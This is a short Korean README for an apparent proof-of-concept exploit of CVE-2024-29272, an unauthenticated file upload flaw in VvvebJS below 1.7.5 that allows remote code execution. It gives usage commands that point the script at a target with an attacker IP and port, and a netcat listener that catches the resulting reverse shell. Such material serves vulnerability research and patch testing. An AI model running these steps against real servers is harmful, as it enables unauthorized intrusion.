
CVE-2024-29272에 대한 개념 증명 익스플로잇, VvvebJS < 1.7.5에서 인증되지 않은 임의 파일 업로드 취약점으로 원격 코드 실행을 가능하게 함.
이것은 CVE-2024-29272에 대한 개념 증명입니다. VvvebJS < 1.7.5 버전에서 인증되지 않은 임의 파일 업로드 취약점으로 인해 원격 코드 실행이 가능합니다.
사용법:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
다른 터미널에서:
nc -lvnp <ATTACKER PORT>